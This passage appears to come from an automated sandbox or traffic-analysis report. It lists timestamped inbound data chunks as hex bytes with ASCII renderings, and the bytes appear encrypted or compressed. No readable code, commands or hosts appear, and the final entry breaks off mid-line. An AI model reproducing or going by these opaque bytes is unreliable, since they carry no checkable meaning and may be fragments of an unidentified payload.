2023-01-05 12:18:10 UTC	1635	IN	Data Raw: 69 c1 b4 22 59 4e 5d b3 e3 11 50 82 85 23 6d b9 60 b3 e5 0d 50 9c dd 4b 5b e0 57 0b 2f 2d 7c 01 f6 d3 92 df ab c3 32 54 01 5a 6c ce 12 f5 15 d8 e4 49 18 a4 87 79 8f 2b 39 8a 2d a8 a2 1c 7a 57 80 92 92 f9 bb 49 f2 99 33 b7 a4 40 8e 12 21 8d dd 70 55 3b d6 ae 05 2a d7 14 7b 16 f2 ac 9a e5 15 26 09 b0 e7 c5 86 e4 b1 c0 8d be 99 d7 84 cd b5 5d 29 e4 5a 40 95 b6 26 6f f8 e2 00 74 5e 52 98 f8 ea 75 3c a5 d3 af bf 0e d3 e6 05 17 22 cf 03 0c cd c6 a4 1a 28 4f 0f 54 3b 4a 29 6d d3 bc a0 f9 bf 37 47 47 90 bc d5 e2 cf 61 56 d3 09 9a ad 43 5a 59 e4 f0 b5 6f ff a6 b4 f7 fb 42 54 ac 4b a4 35 36 9d 7a f3 c5 6c 3a f8 a1 8e 8c 9b 7f 77 cc fb 58 da 77 48 02 5a 87 21 b8 12 6d 03 24 a9 13 f3 e7 55 aa 4b 1b 14 0a a0 a4 01 f3 c9 5b 52 be 29 b9 c8 c9 fc d9 de bc 6b 82 5d 56 05 Data Ascii: i"YN]P#m`PK[W/-\|2TZlIy+9-zWI3@!pU;*{&])Z@&ot^Ru<"(OT;J)m7GGaVCZYoBTK56zl:wXwHZ!m$UK[R)k]V
2023-01-05 12:18:10 UTC	1636	IN	Data Raw: c3 15 04 c6 f2 83 5b 12 c5 2a d1 5a ea d8 39 07 70 ce 5c d5 d8 5c e9 0d 06 ce 21 5b 5f c2 52 65 d9 71 6d 0e c7 a9 79 ff 19 67 4b cb bc d3 02 08 ae c4 a1 39 35 d7 d9 54 1e 21 4d e6 b2 d4 60 22 ad f7 9e 1d 82 23 e9 e0 1d a8 2a c7 4a cd b2 0a 1d 68 94 1a b8 40 d8 5c fe 09 30 e7 68 2e 7e 63 7e b2 00 23 39 71 4e 17 c9 3d 1c d2 a4 be af a3 25 79 1a ac 62 47 8c 9f 9b 1b f9 84 de ac 70 4e db c7 d4 a4 7c be 43 20 6f b4 7a 9c 53 06 c7 59 67 36 5f 9a f9 c6 e4 27 13 5f 9e 3c dd 21 22 8f 28 b0 ed 71 58 80 66 3f 12 36 2a 44 e9 13 3f 6f 9a 3f 29 9a eb 3b 90 2e ae a0 69 ed c3 b7 d9 4f cd fc 5f 01 dd e0 c8 5c 65 93 1b 1a 36 af 0f 98 1b 38 34 ef f4 04 2a 3e 9b df 0e 53 31 34 00 69 b7 90 82 0d 42 c4 06 14 d5 0f 7e 3e 86 0d c8 a3 dd 2b 99 df 48 42 37 85 40 32 b3 5a ee 84 55 Data Ascii: [Z9p\\![_ReqmygK95T!M`"#Jh@\0h.~c~#9qN=%ybGpN\|C ozSYg6_'_<!"(qXf?6D?o?);.iO_\e684>S14iB~>+HB7@2ZU
2023-01-05 12:18:10 UTC	1652	IN	Data Raw: 13 0b 2a 84 cb ef 00 20 c0 02 c3 4f 60 a4 a9 0e 64 0c c3 8f 6f 69 5b bd d2 61 91 c6 29 29 45 6d 27 73 a0 c6 e8 b2 6b b8 6a 6d b0 95 b9 21 57 8e 68 76 2c 59 a5 b4 4c 27 f4 a6 cb 83 90 8c 35 a6 a3 f3 23 ca 4b c4 c8 9a c3 aa f8 08 7d 33 cb 08 6c 83 78 53 da cf 15 eb 98 b8 5a 22 0a 8b 11 43 a6 13 f2 b9 5f db 42 fb df 76 da b0 4b 96 1b 51 ab 19 6b be 28 2c 46 82 5c 3a f2 b5 43 94 2e 87 30 ff 96 ce 35 9b 89 4b 8e 1b 56 87 7a cb c8 48 33 4a 9c 57 07 d5 10 31 f6 7d 0f cf d0 d1 d1 c1 bb bf be 1c 51 48 35 b8 f4 32 ff 27 37 fe f7 c9 8d 2f 48 c0 47 78 64 f8 39 87 ed d0 f8 2a f0 c9 14 85 43 8a ed bf 81 ea 4c 02 8e f4 d0 18 4d 38 a5 ca 98 fe 0d 11 76 2d c8 6e 4f 74 c7 6c e8 f8 28 a0 38 15 37 53 91 2e 5e 39 2d ab 88 c2 07 08 a3 6a b4 53 27 91 98 54 19 f2 13 03 d0 89 21 Data Ascii: * O`doi[a))Em'skjm!Whv,YL'5#K}3lxSZ"C_BvKQk(,F\:C.05KVzH3JW1}QH52'7/HGxd9*CLM8v-nOtl(87S.^9-jS'T!
2023-01-05 12:18:10 UTC	1653	IN	Data Raw: 10 d5 27 a8 a4 36 b9 66 1d d5 4f 07 33 c5 0e 4d f2 47 46 6b 4a 19 31 42 81 bf 47 d0 98 23 5f 3e 63 ff 23 70 d4 00 0b 81 21 01 cd 0a c8 23 94 fb 43 4a 99 2a 25 d5 1d 92 f4 08 40 e2 a8 ae b9 c2 c3 0a 23 0c 70 28 c1 9b 74 ef 0c 09 13 0e df b0 a0 1a f0 3c 25 66 4d 8d 12 c5 d9 d2 d3 c6 b9 6a 90 1d 56 6c 36 a2 c8 af cb 03 70 54 e1 e3 a8 8e 27 a4 25 5c 82 df f5 ac ba a3 ea 8e 23 8e 7e ee 17 25 4e 28 a2 ec 2a fa 2c aa 9f a0 2a 4d 05 73 16 bd 8e ab 46 fb f1 bf c1 a4 bd 89 1e 11 4d d0 7e a9 59 63 42 1b 54 1d d1 01 91 9d c7 74 f2 87 a0 ca 21 b5 37 8f e8 e7 8b ac d8 f3 f4 71 7f 2b bf 6c 0e fd eb bf a4 2c 0d fa a2 fa bd ff 83 1a ff 1b 65 c6 4f 3c 04 5a 9c 07 23 1a c8 e2 d8 3e 0c d5 43 28 4e e3 79 97 cc 40 6c 62 9f 74 3f d7 c1 5b db f8 6c bc c0 0b db d0 12 2f 32 cb 10 Data Ascii: '6fO3MGFkJ1BG#_>c#p!#CJ%@#p(t<%fMjVl6pT'%\#~%N(,*MsFM~YcBTt!7q+l,eO<Z#>C(Ny@lbt?[l/2
2023-01-05 12:18:10 UTC	1669	IN	Data Raw: c0 6a d2 dc 9b 06 f2 6d 17 7f b4 0c 9c 7e 19 c1 40 09 02 ba eb 9b ff ef 0c 07 bc 03 45 06 a0 8a ce 7c e1 33 63 64 56 24 db 69 8a ec 0a 4c 76 1b 49 c1 1d 2d f6 8a 03 24 86 93 56 93 cd 54 d6 21 69 3d 0e 83 3c fe 5e 63 ca f3 35 a1 6a 81 19 90 9f a3 72 c8 f2 af b1 4c cb f4 f7 cb 04 b9 38 70 f3 12 4a 4d c4 03 6b 3c 96 fa 88 af 16 e4 ac 5d 36 c1 9a a2 be 43 bf a5 55 18 a5 51 eb d7 00 ac 17 28 b0 c5 a9 60 ca c4 81 1d 80 7e 07 a0 bd 8b c1 7e 06 c4 e4 02 b4 f4 26 e0 0f d9 f0 35 1d 92 92 21 4f 6c d2 05 3b c4 78 28 c1 10 ac 9e d6 8b 07 88 b1 3e 8a a4 15 bd 84 59 d8 f1 31 84 9c 57 78 88 67 52 54 87 4e 07 c5 13 ac 88 4d 5f 84 af e3 cd cc aa b0 1f ed be 3a c2 a0 dc 70 69 14 ff 0a 07 54 6f 83 89 f1 03 7e 6f 8f e1 43 1b 9b e1 15 bb c0 e2 d4 2b dc ba 1a 48 10 0a b4 2c 74 Data Ascii: jm~@E\|3cdV$iLvI-$VT!i=<^c5jrL8pJMk<]6CUQ(`~~&5!Ol;x(>Y1WxgRTNM_:piTo~oC+H,t
2023-01-05 12:18:10 UTC	1670	IN	Data Raw: 5f 3d b1 6b d4 05 51 b8 f8 22 ba d9 19 90 99 cc a3 69 63 20 78 82 01 ba d3 14 3d 64 79 5d 18 8e bd 60 69 4d a8 54 63 d4 5e 79 88 88 84 e2 7d 03 f0 7a 19 50 12 55 23 7b e9 0d d0 11 af 1b 56 95 98 87 09 a6 d5 c5 ca f8 09 14 3e a1 fc 6c b1 29 b2 74 d3 bd b9 dd 51 84 82 3d dc 06 c2 cc 6a f3 c3 19 76 d0 3d f7 70 8a 98 82 64 57 e8 50 4a f2 f8 4e dc e0 2e 05 79 86 39 de 09 3c 06 c2 64 1f 6d 12 ee 1b d1 7f 43 9f 97 74 af 9d d9 90 15 1c de 5d 50 a3 0c 22 fa 10 59 83 f8 21 44 c1 b8 a3 24 77 65 b2 85 24 04 c0 8a a3 ed 41 f7 64 8c 7c c7 02 04 13 7a 1c 03 60 8c 21 e4 9d 75 f6 65 80 fd 56 46 00 62 d3 c9 33 90 67 87 44 df 41 ce d9 45 8e 33 67 0d 37 99 08 33 a7 3b e8 c2 5d 6c d3 63 31 f9 ae ef a8 6a ea 42 8a 93 41 e3 ce 10 0c 76 11 f1 66 81 fb 5b 18 4c ed 38 d0 46 1c 86 Data Ascii: _=kQ"ic x=dy]`iMTc^y}zPU#{V>l)tQ=jv=pdWPJN.y9<dmCt]P"Y!D$we$Ad\|z`!ueVFb3gDAE3g73;]lc1jBAvf[L8F
2023-01-05 12:18:10 UTC	1686	IN	Data Raw: dd 65 45 8b af 89 45 3a 61 8e 99 c5 79 10 41 1f 9e ff bd c2 a1 e3 73 84 c3 91 54 e1 3a 8a 64 36 dc 3a 65 c5 5c 43 f5 39 37 05 ad 6f 83 5c c6 b0 f4 a9 6d 7d 27 78 2b 01 78 4a 4e d2 85 a9 83 df b6 4f cf c7 7a 94 1e 5f e3 b4 7c 80 77 84 46 63 e1 c4 ad 43 74 8e d4 57 1d 7a ee 85 a6 62 c3 f2 da d2 e9 5e 38 69 0b 2e bd e4 8c 4e f0 9f 37 18 e3 8e ad e0 c9 63 3f 71 b5 a5 c9 80 be 21 9a 15 2b f1 86 ce f7 1a 41 30 d1 6e 4d dd 4f 6f ea 93 b9 ae b0 2e 37 ae e0 cf 3f a9 89 6e d0 cb 6d b1 3d 61 d6 d8 29 15 71 4d 97 fb 05 54 3e 91 11 bd 84 69 4e dc 53 61 1f 5a df ff cc c6 00 8f b2 5a 3c 06 b7 af 41 93 4f 9a d6 27 c9 83 39 eb 22 ed 0e 9f c7 35 fe 48 d0 56 d4 45 65 23 33 3d c5 40 7e c2 b0 0f 9a f9 14 81 67 47 36 ec 2c 0e bb 2b 08 98 9c c5 58 8b 3b 3e 82 1a 86 e5 9a 9e 65 Data Ascii: eEE:ayAsT:d6:e\C97o\m}'x+xJNOz_\|wFcCtWzb^8i.N7c?q!+A0nMOo.7?nm=a)qMT>iNSaZZ<AO'9"5HVEe#3=@~gG6,+X;>e
2023-01-05 12:18:10 UTC	1687	IN	Data Raw: 85 6b 1d 2f b6 42 97 ef ed b2 7b 28 7b 9f f0 a8 63 c4 53 ca 54 ac 24 ba f5 6f 49 67 18 75 1e 48 e5 92 7e f8 1f c9 b1 72 cd f1 d8 90 b9 b3 64 6e 6e 91 db cc 68 54 8b 00 c8 be d5 bb 03 f2 8f cc 4a 18 08 f4 78 02 d3 2f 84 c5 7c 49 98 bd 74 40 bd b9 60 92 ba a2 ec 05 be 41 56 36 0e 8c 05 13 54 88 df 1d 78 e8 5d 39 80 b7 71 d0 78 8d de 2f f0 87 79 56 91 b5 95 38 c1 fc 9c 89 0b 39 05 8a 75 9d 9d b7 28 b8 0b 63 f7 cf dc 25 b9 68 1e 38 13 f6 fe a5 64 bd a0 41 3c b7 57 ab da 93 c0 fd 5f 20 ad 1f 25 7c 1d 44 d4 37 a0 a3 47 bb 67 c5 04 7f ee 65 34 89 f0 c7 b1 ea ae 8b 1e ee 51 40 7e a2 c0 b7 bf f5 03 81 e1 fc f1 6b 06 6f 72 8c 8b bc 8d 79 84 5d 2c cb 17 a9 fc 51 ae fc 99 49 36 61 4b dc 51 e0 35 8c 53 bd f5 9e 2b ac 4a 53 58 73 df c5 78 63 c0 41 86 1a ba f8 d7 ab 2b Data Ascii: k/B{({cST$oIguH~rdnnhTJx/\|It@`AV6Tx]9qx/yV89u(c%h8dA<W_ %\|D7Gge4Q@~kory],QI6aKQ5S+JSXsxcA+
2023-01-05 12:18:10 UTC	1703	IN	Data Raw: 49 be 6e bd d6 9a cf 32 10 8c 77 cd cd f3 a0 46 1f 90 58 b4 cd 55 fb 19 ae 95 89 38 62 31 1e 3b 80 ad af 38 5f f5 5e 4d 7a 27 81 fa 1a 36 f7 4e bd 76 0d b2 ed 53 ed 3d 68 99 26 82 b9 c6 f0 e9 0b d9 d8 35 c7 d5 75 6c c3 83 18 be 89 1b 6a 23 15 76 ca cd 2a fa 21 d8 7f 9a 8c c9 73 f6 94 53 e0 6d 41 79 79 e7 8b 5f 01 8c 5e 28 64 9a 4e e4 5e 9c fc b4 60 ee 29 3b bd 67 e0 87 6a 3c fe c6 5c 99 0b 68 e2 b5 be f3 8c 99 ff a0 e8 2b 51 18 e4 19 97 da fe d9 82 d5 25 83 b0 7e 90 87 d5 61 fa 08 47 d2 4c eb d4 f2 ad 52 f0 a1 0f 8d 7f c3 d1 75 03 44 28 2b 25 47 92 48 3e fc d6 71 f4 03 fe 19 c9 55 00 40 e4 a2 69 1a 56 5e 80 4e ec 3c d2 ad 5a a6 0b 0c aa c4 54 f9 9a 1f 7e 64 a4 fe b4 ed 27 32 8a ab d2 17 9e 01 5f 45 04 d4 b9 7d d1 c4 0e 7e 13 ac b5 a3 81 b2 10 67 51 16 b4 Data Ascii: In2wFXU8b1;8_^Mz'6NvS=h&5ulj#v*!sSmAyy_^(dN^`);gj<\h+Q%~aGLRuD(+%GH>qU@iV^N<ZT~d'2_E}~gQ
2023-01-05 12:18:10 UTC	1704	IN	Data Raw: a2 c9 23 24 26 05 b1 af ba 89 9a 08 8e 15 78 e2 86 b0 64 44 42 5a 17 52 fd 2c 8b f6 e9 b7 ee b0 cc f3 52 b5 ce f3 61 fe cd a5 0b 23 64 be 9f d2 f1 ad d1 b5 73 a1 9e a7 2c 6e d9 98 c9 11 e2 45 43 5a 53 51 0d 9d d4 25 6d 2a 90 84 b4 2d 7a 19 13 eb 2a b9 7a 76 e4 69 af f8 c9 7b 07 cf 9d 48 d9 37 10 51 72 33 5c ba e3 4f 0c af 2a 60 d0 ef 61 e6 6d d5 f7 33 c1 42 0a 5e 57 00 49 2c 9c e3 6f 0e 8d 33 28 c9 bb 95 3e 36 87 a6 82 b3 b9 75 40 ad 90 d1 df 5e df 14 fd 97 81 ce 6f 4c 1a 19 21 5e ee 71 4e 27 ce fb b5 ab 31 c0 55 7d 4a ae 8e f9 11 39 67 77 5a 6c cd 39 36 ec c9 4b a8 c6 9c 82 6f d8 cd 80 c9 70 88 0b 2b c5 d0 a2 ec ef f5 1d c6 b2 44 82 79 fb 1b 60 0a d1 42 6b 77 73 4a 2e 58 18 86 f5 e1 26 7e b1 86 8a 51 e1 ba 8a 3d e3 06 96 5e 24 1c 2f a9 28 6e 0d b5 bd 62 Data Ascii: #$&xdDBZR,Ra#ds,nECZSQ%m-zzvi{H7Qr3\O*`am3B^WI,o3(>6u@^oL!^qN'1U}J9gwZl96Kop+Dy`BkwsJ.X&~Q=^$/(nb
2023-01-05 12:18:10 UTC	1720	IN	Data Raw: ff fa 3f 26 35 9d d3 05 2e 6f 62 f2 f8 88 7e 73 e9 b6 7d 87 5e dc 99 19 73 26 57 a9 4b 49 70 0d c6 9c d9 50 df 31 28 f1 48 15 d0 e6 b6 6a a8 6f b6 38 fc 2f 7a ea 3a b5 6b 9a 97 a1 e4 4b ef d8 f9 6f ad 9d 81 13 b7 18 af d0 8c 5d 56 55 03 4d 28 06 83 6a fc d6 74 85 13 0f f3 55 15 9e 91 8e d0 b5 a1 c3 c4 9c 73 c1 15 21 80 ab 60 1f 96 49 d4 9e a8 1a 5e 1d 4a 4b 08 df c6 c3 dc 4b d0 99 c9 63 9f 4b c3 7c d6 cc b7 f4 b6 a7 fc 25 2f 7a e3 30 c5 bb 12 ed a4 2b 32 fd 0d 3e 7e a6 c8 2c 01 bb da 5a ae 7f bd be 2b 71 50 04 c9 fc 4e ca d8 92 a9 e7 92 7a b5 4d e2 9b 55 76 2d e3 78 e2 57 46 8a ac 4b 6a c1 60 b7 8c 13 aa cb 6c 22 7b 18 f6 00 b0 59 60 c5 1f 3a d1 be 59 32 ae 09 6b bb 38 d2 a7 38 dd bf a9 6c 2b 42 4d 1a d6 6d 48 e4 99 93 59 a6 85 a9 ac a3 e5 ac c2 1f 11 08 Data Ascii: ?&5.ob~s}^s&WKIpP1(Hjo8/z:kKo]VUM(jtUs!`I^JKKcK\|%/z0+2>~,Z+qPNzMUv-xWFKj`l"{Y`:Y2k88l+BMmHY
2023-01-05 12:18:10 UTC	1721	IN	Data Raw: ce de 09 3a e7 e1 c8 1a 35 97 43 9f 66 79 ac 13 41 54 d3 37 08 4f e9 43 26 63 5f 02 c0 50 96 d2 bf 57 e5 37 33 50 7d 4f 46 d0 54 08 7d 6a 4d 1f a8 91 0a 34 d1 53 ff bf 1e 93 bc aa 00 fa ad f6 7a 65 9f 67 f9 10 3f 40 82 a7 8a a1 aa ac d1 b9 56 60 2b 10 e8 cb 65 bc f5 ee d2 56 e6 4a 84 ca 1d 39 44 52 37 a6 64 25 9d d2 1f f5 28 9e aa 82 86 0e 20 a7 4b ca a8 47 3b 21 a8 95 6a b4 50 a1 97 dc 2b 06 b3 14 b9 1b 65 d7 58 ca 41 49 49 f7 ea 24 e8 2b 47 ea b2 0d aa 6e 91 7a dc c1 5b 7d 59 1b eb b2 74 b3 5f 62 33 6f 9d 6e 83 28 fd 09 ce ef ae c6 ea 8d 49 35 1d b3 23 bf 9c 2b 39 7a ac 12 72 fb 3f ac f2 7b 81 b4 8d 48 0d 9a b6 e9 c0 a5 76 f0 a5 9f 5d 89 45 f8 ee b9 5f dc 88 f1 0c 7d 5f 30 e9 9e 02 06 51 77 f5 7e 71 3b 5e 68 0a 46 1e ca 65 8c 75 5e 1a 5d 5f c7 91 57 51 Data Ascii: :5CfyAT7OC&c_PW73P}OFT}jM4Szeg?@V`+eVJ9DR7d%( KG;!jP+eXAII$+Gnz[}Yt_b3on(I5#+9zr?{Hv]E_}_0Qw~q;^hFeu^]_WQ
2023-01-05 12:18:10 UTC	1737	IN	Data Raw: 90 dc b0 bc 6d 71 c9 3b 96 b7 73 29 6b 2f 6c 22 13 fc 52 1b 6b 7d 41 5f 98 16 1a 3a 34 bd f5 55 f3 0a fd e6 35 9e ee f1 57 e6 e7 f9 fe 43 1a 13 64 30 bf 92 fa fd 25 90 ea 86 48 e1 cd 8b 1a a4 05 0b 14 d1 29 0b d0 4c 28 50 c5 47 3e d2 4d b4 1d 5e 67 96 4d 5d 32 3c be db 89 5b 22 48 98 3b 97 bf bc 37 73 c6 fb 0f 74 56 17 5d d6 fe fd 3f 1f 90 0f 1f c6 c7 b5 4c 83 3b 76 cf c7 28 02 de 48 6b 68 53 2f a5 1d d9 2d 07 5e c5 67 3b b6 b7 66 05 7a 7a 41 39 7e a2 02 26 a6 83 10 7a be 50 f2 ee a2 05 bb e4 00 fc c2 02 dd 8b 70 2c 69 e9 e6 a4 9d 2b dd ce 3b d4 fe 14 e8 71 cd e8 97 53 e5 57 30 f0 7b 32 81 02 ff 79 9d 17 32 bc 63 63 87 ec a5 22 9a b0 44 f5 5f e9 9f 68 b8 72 c4 81 03 7a 5c fe d9 cc 94 89 06 fe e0 dc fa 43 6f 94 89 9a f7 ac 16 f2 b7 7f 04 f5 7b 50 10 85 98 Data Ascii: mq;s)k/l"Rk}A_:4U5WCd0%H)L(PG>M^gM]2<["H;7stV]?L;v(HkhS/-^g;fzzA9~&zPp,i+;qSW0{2y2cc"D_hrz\Co{P
2023-01-05 12:18:10 UTC	1738	IN	Data Raw: 30 ba 36 6f 9d 91 dd 4c c0 46 65 ef d9 67 64 c5 da 26 c2 95 a6 ae ee 69 b9 82 e8 0f 63 a8 fd 90 33 21 63 b3 fa a9 34 8e d7 98 73 ba e0 15 6a e1 16 4f a0 26 c5 28 b2 ee c3 1a f7 c4 e6 43 f7 7b 00 26 ba 75 1e 1c f1 6b 7c 38 19 86 de fa b7 bf af da ff 93 b1 38 c4 11 86 0d bc 32 67 ee d1 7b 15 6b 3c 4e 44 75 27 40 e0 98 f8 31 65 18 be 91 cf 78 8a 88 1d 22 0a fb e4 25 73 ff fd 13 c4 b8 b5 c1 65 06 3f 98 18 05 9a 22 bc 7b a8 dd 7b 45 ac 02 7d 68 28 27 d7 7a d0 b4 de f7 c9 df 7a 14 35 d2 e0 fc 9e 33 1f 77 b4 0b 79 62 bd 73 47 67 3d 22 8b 1b 11 b8 a7 dc ad 9f d4 45 6f 00 dc 63 96 aa 0f a3 f5 96 b8 37 11 9f 2e 50 c6 0d 00 54 52 20 7a b6 fe a6 01 51 97 32 42 9a 08 a0 5b b4 eb 83 c4 be 26 43 74 c1 df a9 98 25 c7 e8 8e 6b 42 a1 01 dd 4b 07 f9 f4 24 43 ec cb 3e b4 73 Data Ascii: 06oLFegd&ic3!c4sjO&(C{&uk\|882g{k<NDu'@1ex"%se?"{{E}h('zz53wybsGg="Eoc7.PTR zQ2B[&Ct%kBK$C>s
2023-01-05 12:18:10 UTC	1754	IN	Data Raw: b3 5e 6b cd 9e c9 e8 26 d6 21 95 15 91 53 65 e3 c1 4d 4a 4c 8d a1 11 3c 75 4e 7d 61 89 26 c8 e8 3a 21 7e 13 da 3e f5 36 74 74 4a 3b cd ee 89 15 07 43 58 fb 0c 69 f6 ac a8 ce e3 d6 de b0 a4 7c c9 0f 34 44 1f 1f 43 a2 4e 7f ca 49 5a 5b 1b 84 9c d9 ef 19 b3 46 51 f8 e5 52 dc 12 fe 8c 60 16 2b 6d d1 ce b1 13 d6 a4 de db d4 de 10 db 35 f7 6c 1d e2 93 f2 c5 7f 79 c5 4e b4 36 47 9e d9 ca 91 d8 ff d6 7a 8c 1c 38 fe 86 43 6e 67 6c fa 70 11 be f8 6d 76 9e ed 2b 4b 01 6e c9 3d 43 48 59 1d d7 74 c6 5b f0 ec b7 df e8 fd 9f 85 78 94 8d 37 6d 32 cb 21 b3 62 3b ee 48 fb 34 be 6f c0 0a a7 f4 83 cf 84 f9 75 2a 84 6b bf e3 43 5f b6 b0 7e fa 46 4e 64 39 a2 23 63 84 44 58 31 56 b3 0f 71 e2 11 b9 d7 16 9c 3a 68 1f 81 5c af 06 c3 3c 94 bf e2 6d ff 62 54 f8 9e 31 cb d1 f8 9d 8d Data Ascii: ^k&!SeMJL<uN}a&:!~>6ttJ;CXi\|4DCNIZ[FQR`+m5lyN6Gz8Cnglpmv+Kn=CHYt[x7m2!b;H4ou*kC_~FNd9#cDX1Vq:h\<mbT1
2023-01-05 12:18:10 UTC	1755	IN	Data Raw: 12 79 cc 21 d1 e6 08 30 51 a1 37 d8 eb f0 e7 42 d2 c6 ec 01 59 c6 f1 ae e7 ef d1 a1 74 50 cd ba 72 58 1e 3d dd 8f bf 2e fe 56 e6 71 4b d4 df 4c 65 b8 8c b0 c8 a5 cf 7a 8b cb fa a0 17 fb 94 4a 37 8c 1b 99 4f 35 00 8f d0 a7 b5 46 e3 8c 9b 75 07 dd 2f 31 a5 9f b1 bd 6f 28 3b 0f 00 91 1b 0b 50 93 44 df ba 03 ff 86 94 eb 0c 36 9b 05 9b 17 b5 04 e7 08 c7 99 63 70 80 73 be a6 a9 fb eb 99 c7 73 6a 9d 37 ef d0 01 c0 32 f6 e4 15 91 ab 1b 46 e2 89 ff 5b c4 c5 d5 2c a6 9f b0 39 24 68 72 1b b2 1c 56 c4 0d bd 3f 39 27 4b 06 c1 35 95 c5 f3 25 b0 6b ad 36 77 e3 fa da 09 27 c0 4e 8e d4 1b e1 f1 14 56 11 16 2d 04 42 6b a7 a6 bd a9 43 69 7c 76 d6 95 ec b9 0b 55 20 cd 2d d1 c2 5c 4a 6d 10 bf 2c e0 0b 07 95 7b c9 62 91 55 71 ae e8 8d 9e b5 07 ed b8 31 f0 95 f0 e2 03 5f f4 2c Data Ascii: y!0Q7BYtPrX=.VqKLezJ7O5Fu/1o(;PD6cpssj72F[,9$hrV?9'K5%k6w'NV-BkCi\|vU -\Jm,{bUq1_,
2023-01-05 12:18:10 UTC	1771	IN	Data Raw: d9 1a 9e 5b 02 5f 9f 49 3e 92 be 67 47 e1 3c a1 79 5f cb c4 9b 31 5b 3e e9 6b c7 a0 b4 d7 98 fe 95 b8 60 87 aa c3 15 1b e5 88 9e ae 6f 16 3d 37 00 e5 e5 05 34 64 d9 1c d9 6e 91 f0 2e 55 5a f1 23 ae c8 4f 49 36 97 52 a4 d2 60 57 ec c8 3f 02 39 15 2c 63 81 5b f8 f5 7f ee 5f 10 89 cf 94 0b 49 d6 c9 c1 c5 29 c3 8e 9b d1 64 dc 45 68 a6 6c 7e 38 83 08 cc ad 4b 5b 78 b2 a7 a4 e7 c1 96 93 b5 c0 e3 c9 92 b4 86 31 f5 26 6a 36 6e cd 6c 6f 08 df 73 8b 15 8e a1 1e 57 fc b1 a7 88 d6 ad 62 bf 90 a7 54 d7 64 bd 1b 69 ab cc 09 6b c6 9a 8a d2 57 13 42 35 11 0d 1c cc 1e 3b 66 e9 27 81 5e 75 23 f6 93 43 b1 cd 9e f1 01 07 19 20 5d df 1d bc 03 6f d1 d2 42 ed 29 10 e0 16 1a 73 c4 30 32 83 8a 9c 28 eb c7 14 dc 45 7b 72 37 54 31 6d 7a 8d 1c 7f e2 06 bd db d2 02 26 cd 4b 9d fd e5 Data Ascii: [_I>gG<y_1[>k`o=74dn.UZ#OI6R`W?9,c[_I)dEhl~8K[x1&j6nlosWbTdikWB5;f'^u#C ]oB)s02(E{r7T1mz&K
2023-01-05 12:18:10 UTC	1772	IN	Data Raw: 3f 91 3d 54 d1 f8 1d 09 6f b8 d3 56 8e 7d f9 21 f0 f3 d6 25 19 f1 d4 7c a2 34 36 12 ef 8e cc 14 57 74 24 e7 8a db 98 b5 e7 d4 1a bd 6b b2 e0 b9 2c 82 0c c1 60 f1 f7 9f d9 81 f1 ac a0 36 5b 6e d4 81 fd a2 13 99 43 5b b9 9a cf ca c3 83 d3 60 8b c2 b9 94 ef fa a2 e1 ac ea 92 ce e5 ab 5c 98 f1 6f 55 f9 ba 65 0b 2d 93 ef 77 43 f8 9d b6 58 88 da 0b 56 89 a9 0e e5 94 cc 23 19 8a 97 f6 65 5e fb cb 35 61 9f 35 1a d5 a4 ca 3d 92 4b d5 68 45 f7 42 dc 27 12 c1 6f 45 0e 7f e9 65 8f 1c 7f 8f 58 de 19 e6 e6 8c 06 30 28 94 ab 84 67 75 eb 63 8f 89 bf 92 34 ba a6 e7 b0 21 b4 a7 6f 1a a8 78 71 27 4c 3e ef 4c 3e 97 f6 db 8f a8 e7 9a 20 94 27 fb b8 96 80 a3 63 9f 3d e3 18 bc c0 06 8f 58 93 06 dc 57 0f 00 9c 27 fd 7d 82 4c 17 3d 9f 9f 7c 5b 79 97 f2 5a 07 d6 11 b4 75 04 0a 38 Data Ascii: ?=ToV}!%\|46Wt$k,`6[nC[`\oUe-wCXV#e^5a5=KhEB'oEeX0(guc4!oxq'L>L> 'c=XW'}L=\|[yZu8
2023-01-05 12:18:10 UTC	1788	IN	Data Raw: c6 34 c3 9f d9 02 55 26 c9 d7 7b 4d 4f 53 1e 48 8a 90 2c e3 4c dc e9 3b 1b 7e 89 57 6a ea 34 da 69 c2 ef 36 d1 7f dc 20 0b 1e a8 8d 82 0f f8 a8 26 96 6d c5 cb ab 93 3b 6b 99 9b 6c e0 2b ef d7 51 45 cd d9 6a ff aa 7c 0c 2c 77 9c 80 9b 16 fc 62 0b 1b 14 ba e4 40 09 44 b5 f7 d0 8a 86 ae 1b 08 c6 9e 88 68 a6 c0 7c 7a f0 37 3e ea bd fd 0e 0f 28 ba 0b db 91 f7 9a c8 91 da 3d 53 74 72 84 11 45 78 7d 5a 2f 74 ee 37 3e 53 2e 6b 36 c5 f6 c1 0a 19 c6 c3 32 a4 fd 1a 1c 7d c5 da 75 94 07 b7 0b 89 57 ff 0e bd 77 26 fa 90 b3 e1 c2 dc 61 08 e7 3a ca 64 84 de 2b 01 6f e6 c9 94 cf 6e 06 11 09 be c6 13 43 cf b3 56 2f 44 84 cf 51 b6 3d 70 ce 87 b6 bf 4d e0 b0 a3 31 3d 75 b1 74 75 a8 6b c0 55 4b 37 7d 64 91 fd e0 be 6c bb 58 6a 12 e0 3e 4c b5 79 22 b4 91 0f af af 8f 7e 41 f4 Data Ascii: 4U&{MOSH,L;~Wj4i6 &m;kl+QEj\|,wb@Dh\|z7>(=StrEx}Z/t7>S.k62}uWw&a:d+onCV/DQ=pM1=utukUK7}dlXj>Ly"~A
2023-01-05 12:18:10 UTC	1789	IN	Data Raw: 37 32 a3 db 39 fb 07 8e 12 c6 9e 62 3c e1 08 e4 9d 8c aa a4 db 7d a3 d6 a8 aa da 65 3b d2 43 ba ec d4 b7 be 16 e0 12 c2 0e ca ea 7b 4a 17 de 62 a6 5b c0 1b 3a a4 33 19 39 84 39 4d d7 4b dc e7 57 54 cb 9f b5 5c 1f d6 5c 14 f5 cd 83 b8 43 3e a3 9d aa 4a c1 3d 48 ff a9 22 19 be 7c 30 8f 70 c1 16 42 af 47 8a f6 8c b8 bb 8c 19 10 29 be f9 09 7a ba a4 8f 5f c2 36 ef 3d 90 09 81 ce 89 87 7d c5 83 77 94 8f 71 4d b4 51 d3 06 8c 61 2e 19 82 b8 9c 19 f9 5d 13 5c 25 ef 39 51 7c ce e1 47 e7 be d2 9a 0a 66 a2 69 dc 46 2f 5c 47 ab f0 fa 4b 20 07 a4 b4 08 be fa 65 ec 8f e0 9e 06 52 ea 80 72 08 18 c2 51 a7 9d a6 32 bd c5 d4 04 cc b0 25 62 a8 29 10 f5 ce 38 3c 02 64 9d ea 08 4e d5 f6 95 c7 b4 d3 de ad 84 7f 34 60 e8 23 57 6f 19 e6 f8 14 19 d0 53 21 bf 4f 